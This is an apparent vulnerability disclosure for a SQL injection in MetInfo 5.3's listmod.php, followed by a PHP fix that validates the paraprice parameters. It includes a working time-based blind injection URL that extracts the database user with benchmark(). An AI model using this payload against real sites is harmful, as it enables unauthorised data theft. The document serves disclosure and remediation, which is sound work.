MetInfo latest SQL Injection
See MetInfo5.3/include/global/listmod.php, lines 164-184:
foreach ($dbparaname as $key => $val2) {
    $prices1 = "paraprice_" . $val2['id'];
    $prices  = $$prices1;                 // variable-variable: the value comes from the request
    var_dump($prices);
    if ($prices) {
        if (!strstr($prices, "-")) {
            // single value: only the leading number is kept
            preg_match('/([0-9\.]+)/', $prices, $result);
            $results = $result[0];
            $serch_sql .= " and exists(select * from $met_plist where module=3 and $met_plist.paraid='$val2[id]' and $met_plist.listid=$dbname.id and $met_plist.info > $results) ";
            $serchpage .= "&" . $prices1 . "=" . trim($$prices1);
        } else {
            //echo 3;
            // range "low-high": only the upper bound goes through preg_match,
            // $prices_sql[0] is concatenated into the query unfiltered and unquoted
            $prices_sql = explode('-', $prices);
            preg_match('/([0-9\.]+)/', $prices_sql[1], $result);
            $results = $result[0];
            $serch_sql .= " and exists(select * from $met_plist where module=3 and $met_plist.paraid='$val2[id]' and $met_plist.listid=$dbname.id and $met_plist.info > $prices_sql[0] and $met_plist.info < $results) ";
            $serchpage .= "&" . $prices1 . "=" . trim($$prices1);
        }
    }
}
Here
$prices_sql[0]
is neither validated nor enclosed in single quotes, so it leads to SQL injection, although the conditional logic above it has to be satisfied first.
First, there is a variable overwrite: the variable-variable assignment
$prices=$$prices1;
reads whatever request parameter is named
paraprice_".$val2['id']
and that parameter is under our control.
Constructing the following URL is enough to reach the vulnerable branch:
http://127.0.0.1/MetInfo5.3/download/download.php?search=search&mdmendy=1&paraprice_14=tomato-xxxx&mdname=product
Check the MySQL log to confirm the value lands in the query unchanged.
Then construct the exploit:
http://127.0.0.1/MetInfo5.3/download/download.php?search=search&mdmendy=1&paraprice_14=1) or if(ascii(mid(user(),1,1))=114,benchmark(10000000,md5(2)),1)%23-xxxx&mdname=product
The injection succeeds.
Solution:
Filter the paraprice_* values (accept only numbers or a number range and cast them to numeric) before they are concatenated into the query.
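As an added example (not MetInfo's own code), the following PHP shows one way to apply that filter to the listmod.php logic above. It replaces the $$prices1 lookup with an explicit $_GET read, validates the whole value with anchored regexes instead of salvaging a leading number with preg_match, and emits only PHP-formatted floats into the SQL text. The helper names metParsePriceRange() and metBuildPriceClause() are assumptions, and the $met_plist, $dbname, $dbparaname and $_GET values at the top are constructed so the script runs offline.

```php
<?php
// Constructed sample environment, standing in for the variables listmod.php has in scope.
$met_plist  = 'met_plist';
$dbname     = 'met_product';
$dbparaname = [['id' => 14], ['id' => 15], ['id' => 16]];
$_GET['paraprice_14'] = '10-20';        // well-formed range
$_GET['paraprice_15'] = 'tomato-xxxx';  // malformed, from the page's probe request
$_GET['paraprice_16'] = '1) or 1=1#-9'; // not a number: must be rejected outright

/**
 * Assumed helper: parse a paraprice_N request value into [low, high].
 * Accepts "12", "12.5" or "12-20"; high is null for a single value.
 * Returns null for anything that is not a whole-string number or range.
 */
function metParsePriceRange($raw)
{
    $raw = trim((string) $raw);
    // Anchored patterns: the whole value must be numeric, so a payload such as
    // "1) or ..." is dropped instead of having its leading "1" extracted.
    if (preg_match('/^(\d+(?:\.\d+)?)$/', $raw, $m)) {
        return [(float) $m[1], null];
    }
    if (preg_match('/^(\d+(?:\.\d+)?)-(\d+(?:\.\d+)?)$/', $raw, $m)) {
        $low  = (float) $m[1];
        $high = (float) $m[2];
        return ($low <= $high) ? [$low, $high] : null;
    }
    return null;
}

/**
 * Assumed helper: build the EXISTS clause from already-validated bounds.
 * %F is the locale-independent float format, and paraid is cast to int,
 * so no request string is ever interpolated into the SQL.
 */
function metBuildPriceClause($met_plist, $dbname, $paraid, array $bounds)
{
    list($low, $high) = $bounds;
    $paraid = (int) $paraid;
    $sql = " and exists(select * from $met_plist where module=3"
         . " and $met_plist.paraid=$paraid"
         . " and $met_plist.listid=$dbname.id"
         . " and $met_plist.info > " . sprintf('%.2F', $low);
    if ($high !== null) {
        $sql .= " and $met_plist.info < " . sprintf('%.2F', $high);
    }
    return $sql . ") ";
}

// Replacement for the vulnerable loop body: read the parameter explicitly,
// validate it, and skip the filter entirely when the value is malformed.
$serch_sql = '';
foreach ($dbparaname as $val2) {
    $paramName = 'paraprice_' . (int) $val2['id'];
    if (!isset($_GET[$paramName])) {
        continue;
    }
    $bounds = metParsePriceRange($_GET[$paramName]);
    if ($bounds === null) {
        error_log("rejected $paramName=" . $_GET[$paramName]);  // surfaces probing in logs
        continue;
    }
    $serch_sql .= metBuildPriceClause($met_plist, $dbname, $val2['id'], $bounds);
}

echo $serch_sql, PHP_EOL;
// Only the paraprice_14 clause is emitted; paraprice_15 and paraprice_16 are rejected.
```

Ignoring a malformed value (rather than trying to repair it) keeps the search usable for legitimate users while giving the injected string no path into the query; the error_log() call also gives operators a signal to alert on.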